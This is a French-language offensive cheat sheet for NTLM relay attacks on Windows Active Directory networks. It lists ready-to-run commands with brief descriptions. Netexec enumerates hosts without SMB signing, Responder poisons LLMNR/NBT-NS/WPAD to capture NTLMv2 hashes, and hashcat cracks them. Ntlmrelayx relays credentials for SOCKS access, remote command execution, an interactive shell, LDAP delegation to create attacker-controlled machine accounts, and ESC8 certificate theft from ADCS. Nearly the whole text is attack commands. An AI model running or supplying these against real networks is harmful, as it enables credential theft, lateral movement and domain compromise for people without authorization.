nxc smb $CIDR -u $USER -p $PASS --gen-relay-list relay.txtDescription: Identifier tous les hôtes sans SMB signing : candidates pour le relay.
Pre-Exploitation
NTLM relay via Responder + ntlmrelayx : SOCKS, commandes distantes et relay LDAP.
nxc smb $CIDR -u $USER -p $PASS --gen-relay-list relay.txtDescription: Identifier tous les hôtes sans SMB signing : candidates pour le relay.
nxc smb $CIDR -u '' -p '' --gen-relay-list relay_nosign.txtDescription: Même chose en null session si on n'a pas encore de creds.
Responder -I $IFACE -ADescription: Mode analyse : voir les requêtes LLMNR/NBT-NS sans poisonner (discret, observation).
Responder -I $IFACE -wdFDescription: Mode actif : poisonner LLMNR/NBT-NS/WPAD pour capturer des hashes NTLMv2.
hashcat -m 5600 /tmp/hashes.txt $WORDLISTDescription: Cracker les hashes NTLMv2 capturés par Responder (mode 5600).
ntlmrelayx.py -tf relay.txt -smb2support -socksDescription: Relay vers SOCKS : accès PTH aux hôtes relayés sans cracker les hashes.
ntlmrelayx.py -tf relay.txt -smb2support -c 'whoami'Description: Exécuter une commande sur la cible après relay réussi.
ntlmrelayx.py -tf relay.txt -smb2support -iDescription: Mode interactif : shell SMB vers la cible via netcat après relay.
ntlmrelayx.py -t ldaps://$DC --delegate-accessDescription: Relay LDAP vers le DC : délégation de droits pour créer un compte machine attacker-controlled.
ntlmrelayx.py -t http://$CA/certsrv/certfnsh.asp --adcs --template $TEMPLATEDescription: ESC8 : relay vers le Web Enrollment ADCS pour obtenir un certificat.